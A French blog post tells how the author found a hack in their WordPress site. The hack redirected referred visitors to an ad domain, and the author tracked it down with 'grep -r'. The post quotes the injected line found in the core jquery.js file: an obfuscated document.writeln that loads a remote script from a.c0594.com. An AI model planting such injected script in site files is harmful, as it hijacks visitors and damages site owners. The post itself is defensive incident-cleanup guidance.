Heureux de vous retrouver de nouveau ! Vous savez peut-être faire des recherches dans votre PC pour retrouver les fichiers qui se trouvent dans votre disque dur mais pas chercher les caractères qui se trouvent dans les fichiers de votre disques durs.

Pourquoi rechercher le contenu de ces fichiers ? Pour chercher quand votre site est piraté.

Vous vous demanderiez peut-être c’est quoi l’intérêt de chercher ce qui se trouve dans un fichier… Ayez la réponse dans mon exemple simple.

Récemment, vous ne l’avez peut être pas remarqué mais ce blog (Informagenie) était piraté. Ce qui se faisait était que tous les visiteurs qui visitaient ce blog par le biais (Referer) d’un autre site étaient redirigés dans un autre lien (a.c0594.com/?tz=1) diffusant des pubs adsense.

Je croyais que c’était dû à l’hébergement gratuit. Mais en changeant d’hébergeur, ce comportement n’avait pas changé. Du coup j’ai perdu beaucoup de visiteurs venant des moteurs de recherches, des réseaux sociaux.

Un peu d’analyse (et des recherches) m’a emmené au texte a.c0594.com/?js=1 que je ne savais pas où il se trouvait dans mon installation WordPress. Lorsque j’accède au lien a.c0594.com/?js=1, j’avais exactement le même résultat que mes visiteurs venant de moteurs de recherches voyaient.

En tout cas, c’était la seule piste dont je disposais pour trouver ce qui n’allait pas. Mais, comment trouver cette portion de texte dans l’installation WordPress de plus de 100000 fichiers ? Ouvrir un à un ces fichiers ? Catastrophique !

Aujourd’hui je vous parle d’un outil qui m’a récemment sauvé la vie. Une commande Linux grep qui vous sauvera peut aussi peut-être un jour la vie.

grep est un programme s’exécutant en ligne de commande et qui permet de faire des recherches (extraire, trier et filtrer) dans le fichier. C’est avec celui que j’ai enfin reconnu le but de l’informatique aux humanités (Éviter les travails répétitifs et fastidieux 😀 ).

Grep sous Windows, Linux, Mac et Android

[stextbox id= »warning » caption= »Note 20/08/2019″]

A une épode de la vie de ce blog, 80% de ceux qui me lisaient, était des Androidiens. Raison pour laquelle je m’étais penché à l’utilisation de Grep sous Android

[/stextbox]

Le mieux est que vous pouvez utiliser la commande grep dans quasi tous les OS. Grep est multiplate-forme.

Utilisation de grep

Je ne peux malheureusement pas ici vous faire le tour d’utilisation de cette commande. Je vous montre juste comment j’ai {fixé | règlé} le problème de redirection vers a.c0594.com/?j=1 sous wordpress et pour la suite, Ce tutoriel d’openclassrooms vous sera le plus complet et s’adaptera même dans Android.

Pour fixer mon problème, je me suis placé dans la racine de mes fichiers WordPress et j’ai exécuté la commande

grep -r "0594.com/?js=1"
  1. grep : La commande
  2. -r : est l’argument récursif qui veut dire, chercher dans tous les fichiers de tous les dossiers et les sous-dossiers
  3. « 0594.com/?js=1 » : est juste le caractère susceptible d’être dans l’un de ces fichiers

Et au bout d’environ 3 minutes j’ai eu le résultat complet. Le code malicieux se trouvait dans le fichier jquery.js dans le l’arborescence wp-include/js/jquery/jquery.js . Le voici

document.writeln('<'+'scr'+'ipt type="text/javascript" src="https://a.c'+'0594.com/?js=1"></'+'scr'+'ipt>');

C’était dans le cœur même du WordPress où je n’aurez même pas l’idée de commencer avec s’il fallait voir un à un les fichiers.